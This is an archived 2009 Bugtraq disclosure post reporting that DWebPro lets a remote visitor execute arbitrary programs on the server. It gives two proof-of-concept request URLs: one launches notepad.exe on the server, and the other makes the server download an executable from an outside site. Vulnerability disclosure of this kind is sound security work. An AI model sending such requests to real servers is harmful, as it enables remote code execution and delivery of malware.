[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
DWebPro allow an invader to execute any program at server side
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: DWebPro allow an invader to execute any program at server side
- From: rafa.de.sousa@xxxxxxxxxxx
- Date: Fri, 16 Oct 2009 08:48:20 -0600
The last version of DWebPro allows an invader to execute any program. Just hit
this at your browser:
http://127.0.0.1:8080/dwebpro/start?file=C:\windows\system32\notepad.exe¶ms=C:\hi.txt
And the notepad.exe will open a txt file that calls hi at C:\ server's side.
If you try this:
http://127.0.0.1:8080/dwebpro/start?file=http://www.somesite.com.br/somefile.exe
will open a browser at server side and download the file.
It's really dangerous.
I tested this at last version but may work at older versions as well.
Best Regards,
Rafael Sousa